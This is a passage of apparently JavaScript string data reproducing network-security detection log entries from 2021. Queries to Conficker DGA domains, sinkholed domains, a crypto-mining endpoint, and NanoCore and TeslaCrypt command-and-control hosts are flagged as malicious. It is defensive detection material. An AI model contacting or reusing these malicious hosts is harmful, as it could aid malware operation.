    '"2021-01-11 03:50:09.270261" r2d2 2.200.109.50 60661 8.8.8.8 53 UDP DNS kjxsuggs.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:09.292592" r2d2 8.8.8.8 53 2.200.109.50 60966 UDP DNS (mkcbelnf).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:09.293439" r2d2 10.1.20.50 53 10.2.120.16 1690 UDP DNS (mkcbelnf).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:09.292579" r2d2 8.8.8.8 53 2.200.109.50 60966 UDP DNS (mkcbelnf).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:16.548376" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS vyiulfy.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548573" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS rltgfje.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548589" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS kyrxpotx.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548378" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS vyiulfy.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548696" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS gesngtbz.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548889" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS tezitdme.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548591" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS kyrxpotx.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.549076" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS urpcsnxlgck.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548700" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS gesngtbz.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548870" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS edbrldph.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.550460" r2d2 2.200.109.50 61279 8.8.8.8 53 UDP DNS tezitdme.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.550470" r2d2 2.200.109.50 61823 8.8.8.8 53 UDP DNS urpcsnxlgck.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548367" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS iqfmzqmmgo.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548686" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS dbzymzydzm.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.548882" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS edbrldph.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.549071" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS eahsvlkv.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:16.550439" r2d2 2.200.109.50 61357 8.8.8.8 53 UDP DNS rltgfje.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:20.446124" r2d2 10.43.192.103 59179 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:50:24.053231" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS ohrdkty.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053839" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS mjvdsl.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053241" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS ohrdkty.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053996" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS awjcrwzd.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053436" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ktmenamuihi.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053239" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS drshsupudi.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053829" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS mjvdsl.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.054382" r2d2 2.200.109.50 60759 8.8.8.8 53 UDP DNS ktmenamuihi.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053425" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ktmenamuihi.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053842" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS uhsaacjz.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.055031" r2d2 2.200.109.50 61862 8.8.8.8 53 UDP DNS mjvdsl.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053487" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS sjcwqzcsodz.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.054202" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS whnuwzwqotu.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053610" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS oxubqumy.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.055129" r2d2 2.200.109.50 60436 8.8.8.8 53 UDP DNS awjcrwzd.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.053841" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS uhsaacjz.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.054060" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS fvskpxpz.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.054195" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS whnuwzwqotu.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.054644" r2d2 2.200.109.50 60412 8.8.8.8 53 UDP DNS oxubqumy.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:24.074036" r2d2 8.8.8.8 53 2.200.109.50 61921 UDP DNS (uhsaacjz).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:24.074028" r2d2 8.8.8.8 53 2.200.109.50 61921 UDP DNS (uhsaacjz).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:24.074977" r2d2 10.1.20.50 53 10.2.120.16 1695 UDP DNS (uhsaacjz).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:24.184298" r2d2 8.8.8.8 53 2.200.109.50 60591 UDP DNS (whnuwzwqotu).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:24.184307" r2d2 8.8.8.8 53 2.200.109.50 60591 UDP DNS (whnuwzwqotu).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:31.328939" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS kbytoevo.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.328943" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS vtxkqlwa.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.328949" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS vtxkqlwa.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329206" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS dmpbzszcsnp.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329212" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS rrvwjbms.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329375" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS rjtqepjgft.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329382" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS rjtqepjgft.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329649" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS mwkembjpc.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329527" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS hezufhqs.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329537" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS mwkembjpc.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329823" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS mdnkkucctb.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329837" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS wscjvtly.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329840" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS mdnkkucctb.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329878" r2d2 2.200.109.50 61877 8.8.8.8 53 UDP DNS kbytoevo.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329855" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS rfvdjscp.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.329983" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS rfvdjscp.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.330348" r2d2 2.200.109.50 60896 8.8.8.8 53 UDP DNS rrvwjbms.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.330609" r2d2 2.200.109.50 62421 8.8.8.8 53 UDP DNS wscjvtly.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.330836" r2d2 2.200.109.50 62096 8.8.8.8 53 UDP DNS mdnkkucctb.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.331082" r2d2 2.200.109.50 60213 8.8.8.8 53 UDP DNS rfvdjscp.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:31.349592" r2d2 8.8.8.8 53 2.200.109.50 61588 UDP DNS (hezufhqs).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:32.544658" r2d2 10.43.192.103 59181 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:50:38.561575" r2d2 10.43.192.103 59182 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:50:38.606482" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS amtkiingj.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606296" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS igmnfc.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606770" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS uxounefyyk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606461" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS dylfvbwnsz.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606775" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS uxounefyyk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607177" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS lclnaf.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607198" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS psauykt.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606494" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS amtkiingj.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606951" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS (tggmhq).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:50:38.607777" r2d2 2.200.109.50 62485 8.8.8.8 53 UDP DNS uxounefyyk.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606963" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS utvmkukqpxa.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.606762" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS gelpupat.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607169" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS lclnaf.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607151" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS utvmkukqpxa.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607540" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS ofdrddbt.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607656" r2d2 2.200.109.50 60713 8.8.8.8 53 UDP DNS amtkiingj.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607309" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS psauykt.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.607832" r2d2 2.200.109.50 61859 8.8.8.8 53 UDP DNS (tggmhq).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:50:38.609227" r2d2 2.200.109.50 61312 8.8.8.8 53 UDP DNS ofdrddbt.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.608805" r2d2 2.200.109.50 62536 8.8.8.8 53 UDP DNS lclnaf.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:38.628730" r2d2 8.8.8.8 53 2.200.109.50 61547 UDP DNS (igmnfc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:38.628753" r2d2 8.8.8.8 53 2.200.109.50 61547 UDP DNS (igmnfc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:38.629241" r2d2 10.1.20.50 53 10.2.120.16 1693 UDP DNS (igmnfc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:38.746538" r2d2 8.8.8.8 53 2.200.109.50 61859 UDP DNS (tggmhq).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:38.746545" r2d2 8.8.8.8 53 2.200.109.50 61859 UDP DNS (tggmhq).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:38.747188" r2d2 10.1.20.50 53 10.2.120.16 1696 UDP DNS (tggmhq).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:43.395636" r2d2 2.200.110.232 65416 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:50:45.938469" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS zmoor.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939101" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS jxrjfmagxdv.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939346" r2d2 2.200.109.50 61954 8.8.8.8 53 UDP DNS zmoor.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.938571" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS xlppvior.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939360" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS iwpmw.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.938458" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS zmoor.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.938582" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS xlppvior.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939723" r2d2 2.200.109.50 61274 8.8.8.8 53 UDP DNS pzoxo.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.938698" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS alenepgreji.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.938706" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS alenepgreji.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.938832" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS wzbichzcqli.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939036" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS pjgbqwib.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.938850" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS pzoxo.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939110" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS jxrjfmagxdv.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939045" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS pjgbqwib.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939353" r2d2 2.200.109.50 62083 8.8.8.8 53 UDP DNS xlppvior.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939243" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS mnpyc.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939369" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS uqwnjwo.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939355" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS iwpmw.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939870" r2d2 2.200.109.50 61064 8.8.8.8 53 UDP DNS pjgbqwib.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.939954" r2d2 2.200.109.50 62461 8.8.8.8 53 UDP DNS jxrjfmagxdv.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.940167" r2d2 2.200.109.50 61492 8.8.8.8 53 UDP DNS mnpyc.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:45.940281" r2d2 2.200.109.50 61360 8.8.8.8 53 UDP DNS iwpmw.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:52.401860" r2d2 2.200.110.233 64338 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:50:53.213970" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS joxaad.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214069" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS rovbuyckfwt.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.213960" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS joxaad.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214319" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS viywdxztil.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214505" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS pzlwg.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214312" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS viywdxztil.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214545" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS crgge.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214382" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS pfpcwbw.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214513" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS pzlwg.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214797" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS djubuhat.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214539" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS crgge.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214734" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS xvgmynyhc.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.215048" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS nmvmgp.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214742" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS djubuhat.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.214924" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS kgmyqcyeu.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.215043" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS nmvmgp.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.215562" r2d2 2.200.109.50 62587 8.8.8.8 53 UDP DNS crgge.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.215366" r2d2 2.200.109.50 62088 8.8.8.8 53 UDP DNS pzlwg.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.215621" r2d2 2.200.109.50 61207 8.8.8.8 53 UDP DNS djubuhat.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:50:53.329892" r2d2 8.8.8.8 53 2.200.109.50 60671 UDP DNS (pfpcwbw).info "sinkholed by securityscorecard (malware)" (heuristic)\n' +
    '"2021-01-11 03:50:56.944324" r2d2 10.43.192.103 59187 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:50:59.608274" r2d2 2.200.110.232 63432 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:51:00.489573" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS bsmvjy.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.489580" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS bsmvjy.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.489581" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS xmjiczsljf.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.489810" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS kgyrwi.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.489815" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS kgyrwi.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.489578" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS xmjiczsljf.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490066" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ogetdabc.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490068" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS ogetdabc.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490061" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS sliiljm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490187" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS jbcnlzas.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490190" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS mgmucvkzk.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490183" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS jbcnlzas.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490391" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS bhzrslggm.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490393" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS okulnjmp.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490394" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS bhzrslggm.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490644" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS rnxjnhc.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490843" r2d2 2.200.109.50 60861 8.8.8.8 53 UDP DNS bsmvjy.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.490900" r2d2 2.200.109.50 62321 8.8.8.8 53 UDP DNS kgyrwi.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.492016" r2d2 2.200.109.50 62414 8.8.8.8 53 UDP DNS rnxjnhc.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:00.603659" r2d2 8.8.8.8 53 2.200.109.50 62414 UDP DNS (rnxjnhc).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:51:07.503872" r2d2 2.200.110.232 64672 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:51:07.553775" r2d2 2.200.110.233 64953 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:51:07.767403" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS pdhew.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767429" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS pdhew.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767425" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS segkoha.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767432" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS hzfjkixxkc.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767582" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS xvagicjd.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767576" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS xvagicjd.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767569" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS hgcxvmcwci.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767778" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS tbyjyumvzog.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767772" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS iheqzsfp.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767763" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS tbyjyumvzog.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767970" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS hfxft.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767977" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS gbjuvthbea.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767782" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS iheqzsfp.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.767999" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS gbjuvthbea.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.768128" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS cepjpwe.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.768750" r2d2 2.200.109.50 60659 8.8.8.8 53 UDP DNS hgcxvmcwci.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.768521" r2d2 2.200.109.50 61590 8.8.8.8 53 UDP DNS hzfjkixxkc.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.768776" r2d2 2.200.109.50 61234 8.8.8.8 53 UDP DNS xvagicjd.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.769034" r2d2 2.200.109.50 61851 8.8.8.8 53 UDP DNS iheqzsfp.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.769420" r2d2 2.200.109.50 60166 8.8.8.8 53 UDP DNS gbjuvthbea.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:51:07.769472" r2d2 2.200.109.50 60698 8.8.8.8 53 UDP DNS cepjpwe.net "conficker dga (malware)" 360.com\n' +
